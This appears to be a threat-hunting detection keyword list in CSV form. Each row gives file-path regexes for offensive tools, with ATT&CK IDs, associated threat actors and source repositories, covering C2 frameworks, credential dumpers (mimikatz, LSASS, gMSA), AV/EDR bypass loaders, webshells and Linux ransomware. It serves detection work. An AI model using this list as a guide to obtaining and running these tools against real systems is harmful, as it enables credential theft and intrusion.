"*/gimmeSH.sh*",".{0,1000}\/gimmeSH\.sh.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 - T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","N/A","2","183","28","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z","7412"
"*/giop-info.nse*",".{0,1000}\/giop\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7413"
"*/GithubC2.git*",".{0,1000}\/GithubC2\.git.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","7519"
"*/gkrellm-info.nse*",".{0,1000}\/gkrellm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7520"
"*/glit.git*",".{0,1000}\/glit\.git.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","7521"
"*/glit-cli*",".{0,1000}\/glit\-cli.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","#linux","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","7522"
"*/glit-core*",".{0,1000}\/glit\-core.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","#linux","N/A","8","1","49","7","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z","7523"
"*/GlllPowerloader.git*",".{0,1000}\/GlllPowerloader\.git.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","7524"
"*/GlllPowerLoader.py*",".{0,1000}\/GlllPowerLoader\.py.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","7525"
"*/GlobalUnProtect.git*",".{0,1000}\/GlobalUnProtect\.git.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","1","N/A","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","7526"
"*/globeimposter.profile*",".{0,1000}\/globeimposter\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","7527"
"*/gmailC2.exe*",".{0,1000}\/gmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","7528"
"*/gmer.exe*",".{0,1000}\/gmer\.exe.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","7529"
"*/gmer64.sys*",".{0,1000}\/gmer64\.sys.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","7530"
"*/gMSA_dump_*.txt*",".{0,1000}\/gMSA_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","7531"
"*/gMSADumper*",".{0,1000}\/gMSADumper.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","N/A","3","274","51","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z","7532"
"*/GMSAPasswordReader.*",".{0,1000}\/GMSAPasswordReader\..{0,1000}","offensive_tool_keyword","GMSAPasswordReader","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7533"
"*/GMSAPasswordReader.*",".{0,1000}\/GMSAPasswordReader\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GMSAPasswordReader","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7534"
"*/GMSAPasswordReader.exe*",".{0,1000}\/GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","7535"
"*/GMSAPasswordReader.exe*",".{0,1000}\/GMSAPasswordReader\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7536"
"*/GMSAPasswordReader.git*",".{0,1000}\/GMSAPasswordReader\.git.{0,1000}","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","N/A","7","3","219","34","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z","7537"
"*/GoAWSConsoleSpray.git*",".{0,1000}\/GoAWSConsoleSpray\.git.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","1","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","7538"
"*/gobuster.git*",".{0,1000}\/gobuster\.git.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7539"
"*/gobuster/*",".{0,1000}\/gobuster\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7540"
"*/gobusterdir/*",".{0,1000}\/gobusterdir\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7541"
"*/gobusterdns/*",".{0,1000}\/gobusterdns\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7542"
"*/gobustergcs/*",".{0,1000}\/gobustergcs\/.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","7543"
"*/gocrack.git*",".{0,1000}\/gocrack\.git.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7544"
"*/gocrack/.hashcat*",".{0,1000}\/gocrack\/\.hashcat.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7545"
"*/gocrack/server*",".{0,1000}\/gocrack\/server.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7546"
"*/gocrack_server*",".{0,1000}\/gocrack_server.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7547"
"*/gocrack_worker*",".{0,1000}\/gocrack_worker.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7548"
"*/gocrack-1.0.zip*",".{0,1000}\/gocrack\-1\.0\.zip.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","#linux","N/A","9","10","1233","242","2025-04-14T16:20:05Z","2017-10-23T14:43:59Z","7549"
"*/goDoH.git*",".{0,1000}\/goDoH\.git.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7550"
"*/godoh.git*",".{0,1000}\/godoh\.git.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7551"
"*/godoh/*",".{0,1000}\/godoh\/.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7552"
"*/goDoH/releases*",".{0,1000}\/goDoH\/releases.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7553"
"*/godoh-master.zip*",".{0,1000}\/godoh\-master\.zip.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","7554"
"*/GodPotato.exe*",".{0,1000}\/GodPotato\.exe.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7555"
"*/GodPotato.exe*",".{0,1000}\/GodPotato\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7556"
"*/GodPotato.git*",".{0,1000}\/GodPotato\.git.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","7557"
"*/Godzilla.java*",".{0,1000}\/Godzilla\.java.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7558"
"*/Godzilla-BypassOpenRasp.jar*",".{0,1000}\/Godzilla\-BypassOpenRasp\.jar.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7559"
"*/GodzillaSource.git*",".{0,1000}\/GodzillaSource\.git.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","7560"
"*/gofetch.exe*",".{0,1000}\/gofetch\.exe.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","1","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","7561"
"*/GoFetch.git*",".{0,1000}\/GoFetch\.git.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","1","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","7562"
"*/golang_c2.git*",".{0,1000}\/golang_c2\.git.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021  -  T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","7566"
"*/GoldenGMSA.git*",".{0,1000}\/GoldenGMSA\.git.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","7567"
"*/goldenPac.py*",".{0,1000}\/goldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","7568"
"*/goldenPac.py*",".{0,1000}\/goldenPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7569"
"*/go-lsass.exe*",".{0,1000}\/go\-lsass\.exe.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","7571"
"*/go-lsass.git*",".{0,1000}\/go\-lsass\.git.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","7572"
"*/go-lsass/releases*",".{0,1000}\/go\-lsass\/releases.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","7573"
"*/go-lsass-master.zip*",".{0,1000}\/go\-lsass\-master\.zip.{0,1000}","offensive_tool_keyword","go-lsass","dumping LSASS process remotely","T1003 - T1055 - T1021.005","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/jfjallid/go-lsass","1","1","N/A","N/A","9","1","38","5","2024-07-27T10:35:12Z","2023-11-30T18:45:51Z","7574"
"*/goMatrixC2.git*",".{0,1000}\/goMatrixC2\.git.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","N/A","10","","N/A","","","","7575"
"*/go-mimikatz*",".{0,1000}\/go\-mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/vyrus001/go-mimikatz","1","1","N/A","N/A","10","7","619","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z","7576"
"*/GONET-Scanner/*",".{0,1000}\/GONET\-Scanner\/.{0,1000}","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Discovery","https://github.com/luijait/GONET-Scanner","1","1","N/A","network exploitation tool","N/A","1","82","21","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z","7577"
"*/GonnaCry.git*",".{0,1000}\/GonnaCry\.git.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","1","N/A","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","7578"
